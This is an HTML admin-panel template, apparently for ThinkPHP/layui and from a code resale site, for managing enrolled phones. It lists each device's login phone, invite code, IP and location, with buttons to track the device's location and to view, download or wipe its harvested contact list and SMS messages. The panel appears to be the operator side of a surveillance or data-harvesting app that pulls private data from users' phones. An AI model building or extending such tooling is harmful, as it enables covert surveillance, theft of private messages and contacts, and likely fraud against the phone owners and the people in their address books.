<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>layui  -abnm a.com 搬 码资源网</title>
  <meta name="renderer" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <link rel="stylesheet" href="__PUBLIC__/layui/css/layui.css"  media="all">
  <link rel="stylesheet" href="__PUBLIC__/font-awesome/css/font-awesome.min.css" media="all" />
  <link rel="stylesheet" href="__CSS__/admin.css"  media="all">
  <style type="text/css">

/* tooltip */
#tooltip{
  position:absolute;
  border:1px solid #ccc;
  background:#333;
  padding:2px;
  display:none;
  color:#fff;
}
</style>
</head>
<body style="padding:10px;">
  <div class="tplay-body-div">
    <div class="layui-tab">
      <ul class="layui-tab-title">
        <li class="layui-this">设备查看管理</li>
      </ul>
    </div> 
    <form class="layui-form serch" action="{:url('admin/appv1/user')}" method="post">
        <div class="layui-form-item" style="float: left;">
          <div class="layui-input-inline">
            <input type="text" name="keywords" lay-verify="title" autocomplete="off" placeholder="请输入登录手机" class="layui-input layui-btn-sm">
          </div>
          <div class="layui-input-inline">
            <input type="text" name="code" lay-verify="title" autocomplete="off" placeholder="请输入邀请码" class="layui-input layui-btn-sm">
          </div>          
          <div class="layui-input-inline">
            <div class="layui-inline">
              <div class="layui-input-inline">
                <input type="text" class="layui-input" id="create_time" placeholder="登录时间" name="create_time">
              </div>
            </div>
          </div>
          <button class="layui-btn layui-btn-danger layui-btn-sm" lay-submit="" lay-filter="serch">立即提交</button>
        </div>
      </form>
    
    <table class="layui-table" lay-size="sm">
    	<button class="layui-btn layui-btn-sm delAll_btn" lay-submit="" lay-filter="admin">批量删除</button>
      <colgroup>
      	<col width="10">
        <col width="40">
        <col width="100">
        <col width="30">
        <col width="30">
        <col width="120">
        <col width="120">
        <col width="120">
        <col width="500">
      </colgroup>
      <thead>
        <tr>
          <th><input type="checkbox" name="" lay-skin="primary" lay-filter="allChoose" id="allChoose" /></th>
          <th>ID</th>
          <th>设备名称</th>          
          <th>登录手机</th>
          <th>邀请码</th>          
          <th>最后登录时间</th>
          <th>最后登录IP地址</th>
          <th>最后登录位置</th>		  
          <th>操作</th>
        </tr> 
      </thead>
      <tbody>
        {volist name="admin" id="vo"}
        <tr>
          <td class="news_content"><input type="checkbox" name="imgVo" value="{$vo.id}"/></td>
          <td>{$vo.id}</td>
          <td>{$vo.clientid}</td>
          <td>{$vo.name}</td>
          <td>{$vo.code}</td>          
          <td>{$vo.login_time|date="Y-m-d H:i:s",###}</td>
          <td>{$vo.ip}</td>
		  <td>{$vo.ipdizhi}</td>
          <td class="operation-menu">
            <div class="layui-btn-group">
              <a href="{:url('appv1/dingwei',['id'=>$vo.id])}" class="layui-btn layui-btn-xs a_menu layui-btn-primary" id="{$vo.id}" title="在线设备定位" alt="在线设备定位" style="margin-right: 0;font-size:12px;">在线定位</a>            	
              <a href="{:url('appv1/mobile',['id'=>$vo.id])}" class="layui-btn layui-btn-xs a_menu layui-btn-primary" id="{$vo.id}" title="查询设备通讯录" alt="查询设备通讯录" style="margin-right: 0;font-size:12px;">查看通讯录</a>
             <a href="{:url('appv1/sms',['id'=>$vo.id])}" class="layui-btn layui-btn-xs a_menu layui-btn-primary" id="{$vo.id}" title="查询设备短信" alt="查询设备短信" style="margin-right: 0;font-size:12px;">查看短信</a>              
              <a href="{:url('appv1/exportexcel',['id'=>$vo.id])}" class="layui-btn layui-btn-xs a_menu layui-btn-primary" id="{$vo.id}" title="下载设备通讯录数据" alt="下载设备通讯录数据" style="margin-right: 0;font-size:12px;">下载通讯录数据</a>
              <a href="{:url('appv1/smsexcel',['id'=>$vo.id])}" class="layui-btn layui-btn-xs a_menu layui-btn-primary" id="{$vo.id}" title="下载设备短信数据" alt="下载设备短信数据" style="margin-right: 0;font-size:12px;">下载短信数据</a>              
              <a class="layui-btn layui-btn-xs layui-btn-primary deleteuser" id="{$vo.id}" title="清空通讯录数据" alt="清空通讯录数据" style="margin-right: 0;font-size:12px;">清空通讯录</a>
              <a class="layui-btn layui-btn-xs layui-btn-primary deletesms" id="{$vo.id}" title="清空短信数据" alt="清空短信数据" style="margin-right: 0;font-size:12px;">清空短信</a>
              <a class="layui-btn layui-btn-xs layui-btn-primary delete" id="{$vo.id}" title="删除用户" alt="删除用户" style="margin-right: 0;font-size:12px;"><i class="layui-icon"></i></a>
            </div>
          </td>
        </tr>
        {/volist}
      </tbody>
    </table>
    <div style="padding:0 20px;">{$admin->render()}</div>

    {include file="public/foot"}
    
    <script type="text/javascript">
    
    $("#allChoose").click(function () {
       $("input[name='imgVo']:checkbox").prop("checked", this.checked);
   });

    $('.delAll_btn').click(function(){
                var checkids = [];
                $("input[name='imgVo']:checked").each(function(i){
                    checkids[i] = $(this).val();
                });
                if(checkids.length<=0){
                	layer.msg('请选择要删除的聊天记录!');
                	return;
                }else{
      layer.confirm('确定要删除并清空这些设备的所有数据吗？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('admin/appv1/alldeletes')}",
          data:{delid:checkids},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
             
     }    	
    })

    $('.delete').click(function(){
      var id = $(this).attr('id');
      layer.confirm('确定要删除这台设备帐号和所有数据吗？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('admin/appv1/delete')}",
          data:{id:id},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
    })
    
    $('.deleteuser').click(function(){
      var id = $(this).attr('id');
      layer.confirm('确定要清空这台设备的所有通讯录数据？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('admin/appv1/clearuser')}",
          data:{id:id},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
    }) 
    
    $('.deletesms').click(function(){
      var id = $(this).attr('id');
      layer.confirm('确定要清空这台设备的所有短信数据？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('admin/appv1/clearsms')}",
          data:{id:id},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
    })      
    </script>
  </div>
</body>
</html>
